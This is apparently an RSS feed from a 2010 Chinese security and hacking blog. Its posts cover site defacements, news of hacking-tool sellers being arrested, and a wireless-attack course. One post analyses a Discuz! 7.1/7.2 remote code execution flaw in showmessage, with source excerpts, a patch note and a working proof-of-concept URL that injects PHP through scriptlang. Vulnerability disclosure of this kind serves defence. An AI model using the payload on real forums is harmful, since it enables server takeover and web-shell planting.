http://www.rootkj.cn/index.php zh-cn http://www.rootkj.cn/post/hntxg.php tianya <admin@yourname.com> Fri, 29 Jan 2010 10:07:04 +0000 http://www.rootkj.cn/post/hntxg.php

被黑网站 http://www.xca.gov.cn/


Tags - 湖南通信管 , 通信管被黑 ]]> http://www.rootkj.cn/post/xpiis6.php tianya <admin@yourname.com> Tue, 19 Jan 2010 19:34:14 +0000 http://www.rootkj.cn/post/xpiis6.php Tags - xp , iis6 ]]> http://www.rootkj.cn/post/Googlehf.php tianya <admin@yourname.com> Tue, 19 Jan 2010 07:13:54 +0000 http://www.rootkj.cn/post/Googlehf.php
人民网北京1月19日电 据法新社消息，当地时间18日下午，在宣布退出中国市场、员工停止工作一周后，美国网络巨头谷歌再次表示在中国的业务恢复正常运转。

“在发表声明之后，我们给公司职员放了一段长假，以便运行测试和扫描，保证网络的安全可靠”，谷歌在回复法新社的询问中说，“谷歌中国的职员现在都已经回到工作岗位，一切业务正常运行。”

上周，新京报报道称谷歌中国的工程师不再能进入公司的全球数据库，不能正常工作。

美国国务院发言人克劳利15日宣布，最早可能在下周初将就谷歌事件向中国发出外交照会。这位发言人说，“它将表达我们对这一事件的关注，并要求中国提供信息，解释这一事件是如何发生的，以及他们准备怎么处理这一问题。”

对此，中国表示谷歌事件不会影响中美关系，但是谷歌必须遵守中国的法律。商务部发言人上周五说，外国公司应该“尊重东道国的法律、公共利益、文化和传统，并为此承担社会责任”。

Tags - google恢复 ]]> http://www.rootkj.cn/post/baidu.php tianya <admin@yourname.com> Thu, 14 Jan 2010 13:02:35 +0000 http://www.rootkj.cn/post/baidu.php

台灣百度公告

台灣百度日前遭受有心人士破壞，導致主機系統癱瘓。

為有更好服務與品質，目前正在搶救資料訊息，請網友靜待佳音。

台灣百度非營利網站，請有心人士切勿以私心破壞大眾網友利益為重。

　

　

有心人士留言如下

Hello ,I am a Chinese Hacker,sorry to enter your server

I make a mistake that I thange your administrator's password

I am so sorry

you can write mail to me admin@0days.net.cn

My main aim is not doing some bad things.....




Tags - 百度 , 台湾百度 , 百度被黑 ]]> http://www.rootkj.cn/read.php/11.htm tianya <admin@yourname.com> Tue, 12 Jan 2010 18:35:55 +0000 http://www.rootkj.cn/read.php/11.htm 睿隆安全小组在任何时候、任何地点都强调，我们强烈反对任何利黑客技术进行的非法行为，同时我们不鼓励也不支持利用网络安全技术进行的“破坏”行为！！本版面之所以讨论网络/无线安全及黑客技术，是希望借此推动网络/无线安全技术的普及，达到提高网络/无线相关人员安全意识，从而进一步提升整体安全水平的目的！！
任何因为个人或个别组织无线攻击行为导致法律问题的，一律后果自负，特此声明。也请大家在学习研究的同时，注意保护好自己的网络。
]]> http://www.rootkj.cn/post/yilimi.php tianya <admin@yourname.com> Sat, 09 Jan 2010 12:59:12 +0000 http://www.rootkj.cn/post/yilimi.php 栖息躁动不止的魂
透视这熙攘的街头，还有人群

寻找一米阳光
唤醒几近颓废的心
拥抱生活的美好，或者不美好

寻找一米阴凉
冷静不时冲昏的头
坦对平淡的现实，哪怕碌碌、乃至险阻重重

寻找一米阳光
晾晒隐着孤独的眼神
欣然依旧还在的诚挚，继续追求、哪怕憧憬

Tags - 一粒米 ]]> http://www.rootkj.cn/post/heiying.php tianya <admin@yourname.com> Thu, 07 Jan 2010 06:03:18 +0000 http://www.rootkj.cn/post/heiying.php
黑鹰的客服说是服务器问题，呵呵都一个多月了没消息，暂时开了个临时论坛 域名 客服的qq号

那临时论坛空间放在美国，大家都知道，国内没证的论坛都关，注册资金100w-盈利性网站(听说广告都不能挂,挂广告就是盈利)

咱们草根站长,呵呵--我有100w,我还忙死忙活的去做网站。额~~

重大的原因是关于小耗子木马吧,  大家都知道 小耗子木马上了cctv...呵呵
http://video.baidu.com/v?ct=301989888&rn=20&pn=0&db=0&s=25&word=%D0%A1%BA%C4%D7%D3%C4%BE%C2%ED

    很多相关的视频  是黑鹰的会员。。。。听说和黑鹰有关系 呵呵牵连了吧


黑鹰不低调，还在河南卫视上打广告 ，当然和河南政府部门有关系吧，现在出了问题，河南的不管了。。。呵呵

    都怕cctv.记得cctv报光cn域名便宜 让很多人大批量注册，里面说18一个 不便宜呢， 过了2天 就下了命令个人不能注册cn域名
    
    cn域名涨价.

    呵呵，也希望黑鹰早日康复吧！  我的博客，www.rootkj.cn 新网不要关我玉米！

下面copy一个新浪的文章
2名男子出售黑客软件获利数百万被捕2010年01月07日11:44  汉网-武汉晚报
　　本报讯(记者 刘丰 通讯员 袁明 饶学兵 王萍 实习生 李学萍)两男子成立公司，专门提供“黑客”软件，吸收1万多名会员，并因此获利数百万元。昨悉，检察机关以涉嫌非法侵入计算机信息系统罪，依法对犯罪嫌疑人李强、张磊批准逮捕。

　　2006年3月，河南人李强和张磊联合成立了黑鹰科技有限公司，李强任公司董事长兼法人，张磊任公司总经理。二人以向会员提供“黑客”软件技术收取会费，获取非法利益。经侦查机关查明：二人自2007年至2009年10月，利用黑鹰科技公司“黑鹰安全网”提供“灰鸽子”、“小耗子下载者”等非法入侵、控制计算机信息系统程序工具软件供人下载使用，按照年收取200至996元不等数目的会费发展会员，共计发展会员1万余人，获取非法利益数百万元。并致使会员高某、韩某等人为了敲诈他人钱财，铤而走险，利用下载的上述工具攻击麻城市黄金桥开发区一网吧，造成40余家固定IP网络中断达60余小时。

　　麻城市检察院近日以涉嫌非法侵入计算机信息系统罪，对李强、张磊予以批捕。


Tags - 黑鹰 , 网站被关 , 大米被抓 ]]> http://www.rootkj.cn/post/dzoady.php tianya <admin@yourname.com> Wed, 06 Jan 2010 12:16:15 +0000 http://www.rootkj.cn/post/dzoady.php
不难想象，exp流传的速度，A与B关系好，A发给B；B与C是好朋友，B发给C...总有人耐不住性子，泄露点风声，于是就人手一份。最受不了的是，竟然有些SB在群里拿来叫卖；实在不想说什么，要叫卖什么时候轮到你？人心不古，以后有的话还是自己藏着吧。

上午漏洞告诉了Saiy，DZ官方的补丁很快就出来了吧。

特别说明：产生漏洞的$scriptlang数组在安装插件后已经初始化，因此有安装插件的用户不受影响。

漏洞介绍：

Discuz！新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化，可以任意提交，从而可以执行任意PHP命令。

漏洞分析：

下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：

一、漏洞来自showmessage函数：

function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
    extract($GLOBALS, EXTR_SKIP);//危险的用法，未初始化的变量可以直接带进函数，直接导致了问题产生，from www.oldjun.com
    global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
    define('CACHE_FORBIDDEN', TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
        if($fp = @fopen($statlogfile, 'a')) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message)."\n");
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = '';
        }
    }

    if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }

    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader("location: ".str_replace('&', '&', $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = '';
    }
    if(in_array($extra, array('HALTED', 'NOPERM'))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }

    include language('messages');

    $vars = explode(':', $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可，用:分割
        eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化，可以自定义，from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? 'ajax_' : '';
        eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
        unset($pre);
    }

    ......
}

二、DZ的全局机制导致了未初始化的参数可以任意提交：

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}

三、misc.php正好有个可以自定义message的点，其实也是未初始化：

elseif($action == 'imme_binding' && $discuz_uid) {

    if(isemail($id)) {
        $msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");
        $msn = explode("\t", $msn);
        $id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));
        $msn = "$msn[0]\t$id";
        $db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");
        showmessage('msn_binding_succeed', 'memcp.php');
    } else {
        if($result == 'Declined') {
            dheader("Location: memcp.php");
        } else {
            showmessage($response['result']);//$response没有初始化，可以自定义，from www.oldjun.com

        }
    }

   }

四、漏洞利用：

showmessage函数里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组。

五、漏洞修复：

1.有补丁的打补丁；
2.没有补丁可以暂时先注释引起漏洞的语句，或者对两个变量赋个值。

poc：

（应Saiy的要求，不发exp了！）注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

rn原文来自:http://bbs.rilone.com
Tags - 0day , dz漏洞 ]]> http://www.rootkj.cn/post/51.php tianya <admin@yourname.com> Tue, 05 Jan 2010 10:15:07 +0000 http://www.rootkj.cn/post/51.php
域名WHOIS信息如下:

　　Domain Name: IT168.COM

　　Registrar: XIN NET TECHNOLOGY CORPORATION

　　Whois Server: whois.paycenter.com.cn

　　Referral URL: http://www.xinnet.com

　　Name Server: NS1.IT168.COM

　　Name Server: NS2.IT168.COM

　　Status: clientHold

　　Status: clientTransferProhibited

　　Status: clientUpdateProhibited

　　Updated Date: 05-jan-2010

　　Creation Date: 25-may-1999

　　Expiration Date: 25-may-2013

　　具内部人士告诉了如下信息:


51.com
　随后编辑拨打新网总部电话得知， 51.com因涉嫌非法信息被Hold ，只有等域名所有人提交申请解除hold。

　　关于51.com

　　51.com成立于2005年8月，是目前中国最大的社交网站，由著名互联网人士庞升东创建， 截至2009年6月底，51.com注册用户数超过1.6亿，月独立登陆用户数超过3850万，日均PV超过3亿。51.com是由美国红杉资本中国基金(Sequoia Capital China)、巨人网络集团(Giant Interactive Group)、海纳亚洲创投(Susquehanna International Group)、英特尔资本(Intel Capital)、红点创投(Redpoint Ventures)等国际著名的企业和风险基金联合投资而成。



Tags - 51 , it , 168 , 域名解析 ]]> http://www.rootkj.cn/post/wirelesssecurity.php tianya <admin@yourname.com> Tue, 05 Jan 2010 03:00:58 +0000 http://www.rootkj.cn/post/wirelesssecurity.php     欢迎收看由Rilone和NB5 给您带来的全国首套无线安全审计培训系列课程
    www.rilone.com   www.nb5.cn
无线安全-作为最近几年的热门话题,家庭和企业用户更是他们离不开的热点.为此我站联合经验丰富

的无线安全专家作为技术后盾.制作了"全国首套"最新最全的"无线网安攻防教程"希望为广大的无线安

全爱好者提供更好﹑更全﹑更新的技术.在此开设了"2009-2010无线安防视频教程".网络安全是一个时

代,无线安全已经到来.你应该做出选择!
   中心思想-本课程以实战为主,理论为辅.好多同学问到为什么要学理论,咱们干脆就演练下工具的使

用不就好了吗?其实这个问题回答有千千万万,但我想告诉大家,我们是为了学习更丰富更有技术性的学

术.正如在你学习外语的时期,老师不会让大家死记句子和单词,更要学会"举一反三".包括现在所有培训

学校和讲师也只能达到抛砖引玉作用.
下载地址
bbs.rilone.com
Tags - wirelesssecurity , 无线网络安全 , 无线网络 , 无线攻防 , 网络攻防 , 无线黑客 ]]>